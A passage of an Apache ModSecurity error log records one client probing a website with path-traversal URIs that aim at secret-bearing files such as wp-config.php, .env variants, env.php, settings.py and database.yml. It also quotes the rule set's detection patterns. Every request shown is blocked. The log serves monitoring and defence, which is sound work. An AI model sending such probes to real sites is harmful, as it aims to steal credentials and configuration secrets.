[Tue May 12 06:17:04.666752 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:60188] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKpwBs7kySIUZ3ORnI1rAAAAQA"]
[Tue May 12 06:17:04.666856 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:60188] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKpwBs7kySIUZ3ORnI1rAAAAQA"]
[Tue May 12 06:17:04.667106 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:60188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKpwBs7kySIUZ3ORnI1rAAAAQA"]
[Tue May 12 06:17:05.136382 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:60188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpwBs7kySIUZ3ORnI1rAAAAQA"]
[Tue May 12 06:17:05.166646 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:60188] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKpwRs7kySIUZ3ORnI1rgAAAQA"]
[Tue May 12 06:17:05.166859 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:60188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKpwRs7kySIUZ3ORnI1rgAAAQA"]
[Tue May 12 06:17:05.629232 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:60188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpwRs7kySIUZ3ORnI1rgAAAQA"]
[Tue May 12 06:17:05.662456 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:60188] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/settings.py"] [unique_id "agKpwRs7kySIUZ3ORnI1rwAAAQA"]
[Tue May 12 06:17:05.662666 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:60188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/settings.py"] [unique_id "agKpwRs7kySIUZ3ORnI1rwAAAQA"]
[Tue May 12 06:17:06.146270 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:60188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpwRs7kySIUZ3ORnI1rwAAAQA"]
[Tue May 12 06:17:06.180349 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:60188] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKpwhs7kySIUZ3ORnI1sQAAAQA"]
[Tue May 12 06:17:06.180553 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:60188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKpwhs7kySIUZ3ORnI1sQAAAQA"]
[Tue May 12 06:17:06.634957 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:60188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpwhs7kySIUZ3ORnI1sQAAAQA"]
[Tue May 12 06:17:06.672699 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:60188] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpwhs7kySIUZ3ORnI1sgAAAQA"]
[Tue May 12 06:17:06.672770 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:60188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpwhs7kySIUZ3ORnI1sgAAAQA"]
[Tue May 12 06:17:06.672942 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:60188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpwhs7kySIUZ3ORnI1sgAAAQA"]
[Tue May 12 06:17:07.130864 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:60188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpwhs7kySIUZ3ORnI1sgAAAQA"]
[Tue May 12 06:17:07.160614 2026] [core:error] [pid 1842385:tid 1842390] [client 45.148.10.166:60188] AH10244: invalid URI path (/files../../../.env)
[Tue May 12 06:17:07.774055 2026] [core:error] [pid 1825287:tid 1825321] [client 45.148.10.166:39284] AH10244: invalid URI path (/files../../../../.env)
[Tue May 12 06:17:08.312441 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.166:39298] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpxPaAnTZtx1_H_wzGjwAAAUU"]
[Tue May 12 06:17:08.312526 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.166:39298] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpxPaAnTZtx1_H_wzGjwAAAUU"]
[Tue May 12 06:17:08.312697 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.166:39298] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpxPaAnTZtx1_H_wzGjwAAAUU"]
[Tue May 12 06:17:08.767959 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.166:39298] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpxPaAnTZtx1_H_wzGjwAAAUU"]
[Tue May 12 06:17:08.793487 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.166:39298] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpxPaAnTZtx1_H_wzGkAAAAUU"]
[Tue May 12 06:17:08.793559 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.166:39298] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpxPaAnTZtx1_H_wzGkAAAAUU"]
[Tue May 12 06:17:08.793723 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.166:39298] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpxPaAnTZtx1_H_wzGkAAAAUU"]
[Tue May 12 06:17:09.270404 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.166:39298] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpxPaAnTZtx1_H_wzGkAAAAUU"]
[Tue May 12 06:17:09.295838 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.166:39298] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKpxfaAnTZtx1_H_wzGkQAAAUU"]
[Tue May 12 06:17:09.295927 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.166:39298] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKpxfaAnTZtx1_H_wzGkQAAAUU"]
[Tue May 12 06:17:09.296097 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.166:39298] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKpxfaAnTZtx1_H_wzGkQAAAUU"]
[Tue May 12 06:17:09.775064 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.166:39298] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpxfaAnTZtx1_H_wzGkQAAAUU"]
[Tue May 12 06:17:09.802983 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.166:39298] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKpxfaAnTZtx1_H_wzGkgAAAUU"]
[Tue May 12 06:17:09.803187 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.166:39298] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKpxfaAnTZtx1_H_wzGkgAAAUU"]
[Tue May 12 06:17:10.294049 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.166:39298] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpxfaAnTZtx1_H_wzGkgAAAUU"]
[Tue May 12 06:17:10.317567 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.166:39298] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/settings.py"] [unique_id 